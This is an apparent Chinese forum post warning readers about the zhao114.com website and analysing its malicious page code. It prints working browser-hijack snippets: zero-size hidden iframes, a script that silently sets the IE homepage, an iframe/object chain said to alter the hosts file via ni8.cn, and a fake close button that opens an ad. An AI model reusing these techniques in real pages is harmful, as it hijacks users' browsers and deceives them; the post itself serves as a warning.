早就聽說了某些網站的惡意代碼,沒想到愚人節讓我碰上一回,一個朋友說道zhao114.com怎么火爆,我就好奇看了眼,簡單的網址站,但是彈出另外的網頁,開始沒大在意,后來發現,這個網站居然修改默認主頁、修改Hosts文件、添加桌面,另外還使用一些頁面欺騙的手法。好奇之下就分析了一下他的源碼,列出如下,請大家小心了:
1) IE防止不住彈出窗口的方法
該網站無數次采用
<iframe src="網址" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
的方式彈出新窗口,包含廣告和病毒代碼。
2) 不提示設置首頁彈出一個js文件(setmyhome.js)。
主要代碼是下面的sethome()函數
<!--
function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
function DeleteCookie (name) {
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}
//設置cookies時間,自己根據情況設置。
var expDays = 1;//這里設為 1 天
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));
function amt(){
var count = GetCookie('count'); //同一ip只顯示一次
//var count;//同一ip只顯示N次
//alert(count);
//count = null;
if(count == null) {
SetCookie('count','1')
return 1
}
else{
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
SetCookie('count',newcount,exp);
//DeleteCookie('count')
return newcount
}
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function sethome(){
document.links[0].style.behavior='url(#default#homepage)';
document.links[0].setHomePage('http://www.zhao114.com');
}
if(amt()==1)
{
sethome()
}
//-->
3) 強行修改hosts文件(in yan88.htm)
<script src="../ads/banner.js"></script>
(in banner.htm)
<IFRAME border=0 marginWidth=0 marginHeight=0 src="banner_files/wo.htm" frameBorder=no width=0 scrolling=no height=0></IFRAME>
(in wo.htm)
<OBJECT height=0 width=0 data=http://www.ni8.cn/set/setdns.chtm></OBJECT>
(in setdns.chtm)
這就是代碼
4) 頁面欺騙頁面右邊出現一個浮動廣告,告訴別人有短消息,點X位置不是關閉,反而使點擊廣告了(中計)。
代碼如下:
<SPAN title=關閉 style="FONT-WEIGHT: bold; FONT-SIZE: 12px; CURSOR: hand; COLOR: red; MARGIN-RIGHT: 4px"
onclick="javascript:closeDiv();window.open('http://www.zhao114.com/v.htm')">×</SPAN>
另外,他添加桌面的方式我就沒有時間研究了,留給有興趣的朋友,不過研究之前千萬小心,最好先GHOST一個備份。感染了的朋友,可以到3721下載一個上網助手2005迅速解決問題。